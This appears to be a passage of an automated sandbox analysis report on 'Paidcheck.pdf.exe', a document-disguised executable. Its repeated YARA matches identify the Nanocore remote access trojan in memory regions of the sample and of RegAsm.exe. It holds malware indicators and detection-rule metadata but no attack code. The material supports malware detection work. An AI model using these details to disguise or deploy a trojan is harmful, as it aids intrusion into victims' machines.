      Source: Paidcheck.pdf.exe, 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIureehicuwdmdjhbahb.dllH vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exeBinary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dll
      Source: Paidcheck.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
